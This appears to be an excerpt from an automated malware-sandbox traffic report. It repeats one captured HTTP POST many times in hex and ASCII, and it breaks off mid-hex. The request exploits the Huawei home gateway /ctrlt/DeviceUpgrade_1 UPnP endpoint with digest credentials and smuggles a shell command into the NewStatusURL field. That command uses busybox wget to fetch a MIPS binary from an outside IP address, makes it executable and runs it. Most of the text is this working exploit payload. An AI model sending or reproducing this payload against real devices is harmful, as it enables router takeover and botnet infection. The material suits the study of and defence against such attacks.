3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 